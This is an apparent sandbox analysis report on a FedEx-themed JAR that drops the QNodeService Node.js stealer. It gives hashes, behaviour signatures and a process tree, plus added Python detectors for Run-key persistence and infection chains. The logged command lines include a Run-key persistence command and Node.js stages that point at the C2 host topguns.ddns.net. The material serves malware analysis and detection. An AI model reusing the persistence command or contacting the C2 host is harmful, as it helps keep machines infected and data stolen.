Analysis
- max time kernel: 42s
- max time network: 133s
- platform: windows10_x64
- resource: win10v20201028
- submitted: 06-11-2020 10:37

Static task: static1
Behavioral task: behavioral1
- Sample: FedEx_Scan21731000921.jar
- Resource: win7v20201028
Behavioral task: behavioral2
- Sample: FedEx_Scan21731000921.jar
- Resource: win10v20201028
General
- Target: FedEx_Scan21731000921.jar
- Size: 111KB
- MD5: 8e2cdac7a60346d7b598d05f421c71a3
- SHA1: 9d1b7dc191121db6017d0cf766c40f7b88083aea
- SHA256: 922f41ec696ff68fa3abfe2926f7fef3f2759fa451b79271d03b97d8a6028f32
- SHA512: 775a5afbe8bad2ca8eccbb713f882d34908b6f6c903a9f5d67292674876fb6e8148abf7bccb01ee317f470c3975f9b030f35e7113f8e59d3d64227dc7f0ced7b
Malware Config
Signatures
- QNodeService
  Trojan/stealer written in Node.js and spread via a Java downloader.
- Executes dropped EXE (3 IoCs)
  pid   Process
  2028  node.exe
  3860  node.exe
  1832  node.exe

- Adds Run key to start application (2 TTPs, 2 IoCs)
  Set value (str) by reg.exe:
    \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\00af0779-6157-484a-9119-287f9a3dac31 = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\""
  Key created by reg.exe:
    \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

- JavaScript code in executable (3 IoCs)
  resource                                      yara_rule
  behavioral2/files/0x000100000001ab6c-177.dat  js
  behavioral2/files/0x000100000001ab6c-180.dat  js
  behavioral2/files/0x000100000001ab6c-184.dat  js

- Looks up external IP address via web service (2 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow  ioc
  24    wtfismyip.com
  25    wtfismyip.com

- Checks processor information in registry (2 TTPs, 6 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  description        ioc                                                                                  Process
  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1                     node.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz                node.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe
  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0                     node.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz                node.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe

- Suspicious behavior: EnumeratesProcesses (18 IoCs)
  pid   Process
  2028  node.exe (4 events)
  3860  node.exe (4 events)
  1832  node.exe (10 events)

- Suspicious use of WriteProcessMemory (12 IoCs)
  description                         pid   Process    procid_target
  PID 3636 wrote to memory of 948     3636  java.exe   75
  PID 3636 wrote to memory of 948     3636  java.exe   75
  PID 948 wrote to memory of 2028     948   javaw.exe  79
  PID 948 wrote to memory of 2028     948   javaw.exe  79
  PID 2028 wrote to memory of 3860    2028  node.exe   81
  PID 2028 wrote to memory of 3860    2028  node.exe   81
  PID 3860 wrote to memory of 1832    3860  node.exe   82
  PID 3860 wrote to memory of 1832    3860  node.exe   82
  PID 1832 wrote to memory of 1784    1832  node.exe   84
  PID 1832 wrote to memory of 1784    1832  node.exe   84
  PID 1784 wrote to memory of 1128    1784  cmd.exe    85
  PID 1784 wrote to memory of 1128    1784  cmd.exe    85
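The Run-key write in the signatures above is the sample's persistence: a GUID-named value under HKCU\...\CurrentVersion\Run whose data starts boot.vbs through cmd /D /C, so that the Node.js stage is relaunched at every logon. The following is an added example and is not part of this sandbox report or of the malware: a small Python detector that splits `reg add` command lines the way reg.exe receives them (including the backslash-escaped quotes that wrap the nested cmd string), extracts key, value name, type and data, and scores autostart writes. The sample command lines are constructed; the second one is the reg.exe command line recorded in this report, the other two are made up for contrast. The scoring rules (script host or shell as the launched program, user-writable path, script extension, GUID value name) are this example's own heuristics, not signatures from the sandbox.

```python
import re

# Constructed sample command lines. The second is the reg.exe command line
# recorded in this report; the first and third are made up for contrast.
SAMPLE_COMMAND_LINES = [
    r'REG ADD HKCU\Software\MyApp /v Installed /t REG_DWORD /d 1 /f',
    r'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "00af0779-6157-484a-9119-287f9a3dac31" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""',
    r'reg.exe add "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v Updater /t REG_SZ /d "C:\Program Files\Vendor\updater.exe" /f',
]

# Autostart keys: ...\CurrentVersion\Run and ...\CurrentVersion\RunOnce, in either
# the HKCU\... shorthand or the native \REGISTRY\USER\<SID>\... form.
AUTORUN_KEY_RE = re.compile(r'\\CurrentVersion\\Run(Once)?$', re.IGNORECASE)
# Heuristics of this example (not sandbox signatures).
SCRIPT_HOST_RE = re.compile(r'(^|\\|\s)(cmd|wscript|cscript|powershell|mshta)(\.exe)?(\s|$)', re.IGNORECASE)
USER_WRITABLE_RE = re.compile(r'\\(Users|AppData|ProgramData|Temp)\\', re.IGNORECASE)
SCRIPT_EXT_RE = re.compile(r'\.(vbs|vbe|js|jse|wsf|ps1|bat|cmd|hta)\b', re.IGNORECASE)
GUID_RE = re.compile(r'[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}', re.IGNORECASE)


def split_cmdline(cmdline):
    """Split a Windows command line into arguments.

    Double quotes group words; a backslash followed by a double quote inside an
    argument is kept as a literal quote, which is how reg.exe received the
    nested cmd /C "..." string in this report.
    """
    args, cur, quoted, i = [], [], False, 0
    while i < len(cmdline):
        ch = cmdline[i]
        if ch == '\\' and cmdline[i + 1:i + 2] == '"':
            cur.append('"')
            i += 2
        elif ch == '"':
            quoted = not quoted
            i += 1
        elif ch.isspace() and not quoted:
            if cur:
                args.append(''.join(cur))
                cur = []
            i += 1
        else:
            cur.append(ch)
            i += 1
    if cur:
        args.append(''.join(cur))
    return args


def parse_reg_add(cmdline):
    """Return {'key', 'name', 'type', 'data'} for a `reg add` command line, else None."""
    args = split_cmdline(cmdline)
    if len(args) < 3:
        return None
    exe = args[0].rsplit('\\', 1)[-1].lower()
    if exe not in ('reg', 'reg.exe') or args[1].lower() != 'add':
        return None
    # reg add defaults: no /v means the (Default) value, no /t means REG_SZ.
    entry = {'key': args[2], 'name': None, 'type': 'REG_SZ', 'data': None}
    flags = {'/v': 'name', '/t': 'type', '/d': 'data'}
    i = 3
    while i < len(args):
        field = flags.get(args[i].lower())
        if field and i + 1 < len(args):
            entry[field] = args[i + 1]
            i += 2
        else:
            i += 1
    return entry


def is_autorun_key(key):
    return bool(AUTORUN_KEY_RE.search(key.rstrip('\\')))


def classify(entry):
    """List the reasons a registry write looks like malicious persistence; [] means not flagged."""
    reasons = []
    if not is_autorun_key(entry['key']):
        return reasons
    reasons.append('writes an autostart (Run/RunOnce) value')
    data = entry['data'] or ''
    if SCRIPT_HOST_RE.search(data):
        reasons.append('launches a shell or script host instead of a program')
    if USER_WRITABLE_RE.search(data):
        reasons.append('target lives in a user-writable directory')
    if SCRIPT_EXT_RE.search(data):
        reasons.append('target is a script file')
    if GUID_RE.fullmatch(entry['name'] or ''):
        reasons.append('value name is a bare GUID')
    return reasons


def scan_command_lines(lines):
    """Return (command line, parsed entry, reasons) for every flagged autostart write."""
    findings = []
    for line in lines:
        entry = parse_reg_add(line)
        if entry is not None:
            reasons = classify(entry)
            if reasons:
                findings.append((line, entry, reasons))
    return findings


if __name__ == '__main__':
    for line, entry, reasons in scan_command_lines(SAMPLE_COMMAND_LINES):
        print(entry['key'], entry['name'], '->', entry['data'])
        for r in reasons:
            print('   ', r)
```

Run over the constructed lines, the report's reg.exe command scores on all five rules while the HKLM\...\RunOnce entry pointing at a vendor executable under Program Files scores on the autostart rule alone; the first line is not an autostart key and is ignored. The same key regex matches the native \REGISTRY\USER\<SID>\...\CurrentVersion\Run path form that the sandbox logged, so registry-event telemetry can be checked with the same function.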
Processes
1. C:\ProgramData\Oracle\Java\javapath\java.exe
   Command line: java -jar C:\Users\Admin\AppData\Local\Temp\FedEx_Scan21731000921.jar
   - Suspicious use of WriteProcessMemory
   PID: 3636
   2. C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
      Command line: "C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\314266b8.tmp
      - Suspicious use of WriteProcessMemory
      PID: 948
      3. C:\Users\Admin\node-v14.12.0-win-x64\node.exe
         Command line: C:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain topguns.ddns.net
         - Executes dropped EXE
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of WriteProcessMemory
         PID: 2028
         4. C:\Users\Admin\node-v14.12.0-win-x64\node.exe
            Command line: C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_KQr1H4\boot.js --hub-domain topguns.ddns.net
            - Executes dropped EXE
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of WriteProcessMemory
            PID: 3860
            5. C:\Users\Admin\node-v14.12.0-win-x64\node.exe
               Command line: C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_KQr1H4\boot.js --hub-domain topguns.ddns.net
               - Executes dropped EXE
               - Checks processor information in registry
               - Suspicious behavior: EnumeratesProcesses
               - Suspicious use of WriteProcessMemory
               PID: 1832
               6. C:\Windows\system32\cmd.exe
                  Command line: C:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "00af0779-6157-484a-9119-287f9a3dac31" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""
                  - Suspicious use of WriteProcessMemory
                  PID: 1784
                  7. C:\Windows\system32\reg.exe
                     Command line: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "00af0779-6157-484a-9119-287f9a3dac31" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""
                     - Adds Run key to start application
                     PID: 1128
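Read top to bottom, the process tree is the whole infection chain: java.exe runs the phishing JAR, javaw.exe runs a dropped .tmp file as a second JAR, that stage starts a dropped Node.js runtime with `-` (Node reads the script from stdin) and a `--hub-domain` argument, two further node.exe instances run boot.js with the same hub domain, and the last of them spawns cmd.exe and reg.exe to install the Run key. As an added example that is not part of the sandbox report, the Python below rebuilds that chain from the "wrote to memory of" events and the process list transcribed from this page, pulls the `--hub-domain` value out of the Node.js command lines, and flags executables started from under C:\Users. The event strings and process table are transcribed from the report; the user-writable-path rule and the `--hub-domain` regex are this example's own assumptions about what is worth extracting.

```python
import re

# Process list transcribed from the report's Processes section: pid -> (image, command line).
PROCESSES = {
    3636: ('java.exe', r'java -jar C:\Users\Admin\AppData\Local\Temp\FedEx_Scan21731000921.jar'),
    948: ('javaw.exe', r'"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\314266b8.tmp'),
    2028: ('node.exe', r'C:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain topguns.ddns.net'),
    3860: ('node.exe', r'C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_KQr1H4\boot.js --hub-domain topguns.ddns.net'),
    1832: ('node.exe', r'C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_KQr1H4\boot.js --hub-domain topguns.ddns.net'),
    1784: ('cmd.exe', r'C:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "00af0779-6157-484a-9119-287f9a3dac31" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""'),
    1128: ('reg.exe', r'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "00af0779-6157-484a-9119-287f9a3dac31" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""'),
}

# WriteProcessMemory event descriptions transcribed from the report (each logged twice).
WRITE_EVENTS = [
    'PID 3636 wrote to memory of 948', 'PID 3636 wrote to memory of 948',
    'PID 948 wrote to memory of 2028', 'PID 948 wrote to memory of 2028',
    'PID 2028 wrote to memory of 3860', 'PID 2028 wrote to memory of 3860',
    'PID 3860 wrote to memory of 1832', 'PID 3860 wrote to memory of 1832',
    'PID 1832 wrote to memory of 1784', 'PID 1832 wrote to memory of 1784',
    'PID 1784 wrote to memory of 1128', 'PID 1784 wrote to memory of 1128',
]

EVENT_RE = re.compile(r'PID (\d+) wrote to memory of (\d+)')
HUB_DOMAIN_RE = re.compile(r'--hub-domain\s+(\S+)')          # assumption: the flag names the C2 hub
USER_PATH_RE = re.compile(r'^[A-Z]:\\Users\\', re.IGNORECASE)  # assumption: user-writable == under C:\Users
AUTORUN_RE = re.compile(r'\\CurrentVersion\\Run(Once)?\b', re.IGNORECASE)


def parent_map(events):
    """Derive child -> parent from 'wrote to memory of' events.

    A parent writing into a child it just created is also what an ordinary
    process launch looks like in this telemetry, so every edge is kept and the
    judgement is made on the resulting chain, not on any single event.
    """
    parents = {}
    for ev in events:
        m = EVENT_RE.search(ev)
        if m:
            writer, target = int(m.group(1)), int(m.group(2))
            parents.setdefault(target, writer)  # first writer wins; duplicates are ignored
    return parents


def ancestry(pid, parents):
    """Return the pids from the root process down to `pid`, guarding against cycles."""
    chain, seen = [pid], {pid}
    while chain[-1] in parents and parents[chain[-1]] not in seen:
        chain.append(parents[chain[-1]])
        seen.add(chain[-1])
    return list(reversed(chain))


def image_chain(pid, parents, processes):
    return [processes[p][0] for p in ancestry(pid, parents)]


def program_path(cmdline):
    """First token of a command line: a quoted path or the text up to the first space."""
    return cmdline.split('"')[1] if cmdline.startswith('"') else cmdline.split(' ')[0]


def dropped_executables(processes):
    """Pids whose program was started from a user-writable path."""
    return sorted(pid for pid, (_, cmdline) in processes.items()
                  if USER_PATH_RE.match(program_path(cmdline)))


def hub_domains(processes):
    """Collect the --hub-domain values the Node.js stages were started with."""
    return {m.group(1) for _, cmdline in processes.values()
            for m in [HUB_DOMAIN_RE.search(cmdline)] if m}


def triage(processes, events):
    """Summarise the tree: dropped binaries, hub domains, and the full chain behind each Run-key write."""
    parents = parent_map(events)
    chains = [image_chain(pid, parents, processes)
              for pid, (image, cmdline) in processes.items()
              if image.lower() == 'reg.exe' and AUTORUN_RE.search(cmdline)]
    return {'dropped': dropped_executables(processes),
            'hub_domains': hub_domains(processes),
            'persistence_chains': chains}


if __name__ == '__main__':
    result = triage(PROCESSES, WRITE_EVENTS)
    print('dropped executables:', result['dropped'])
    print('hub domains:', sorted(result['hub_domains']))
    for chain in result['persistence_chains']:
        print('persistence chain:', ' > '.join(chain))
```

The dropped-executable rule reproduces the report's own "Executes dropped EXE" finding (pids 1832, 2028, 3860, all node.exe under C:\Users\Admin), the hub domain comes out as topguns.ddns.net, and the Run-key write is attributed to the full chain java.exe > javaw.exe > node.exe > node.exe > node.exe > cmd.exe > reg.exe rather than to cmd.exe alone. Rooting the chain at java.exe with a JAR from %TEMP% is what distinguishes this from an installer legitimately registering itself, which is why the chain, not the reg.exe event, is the thing to alert on.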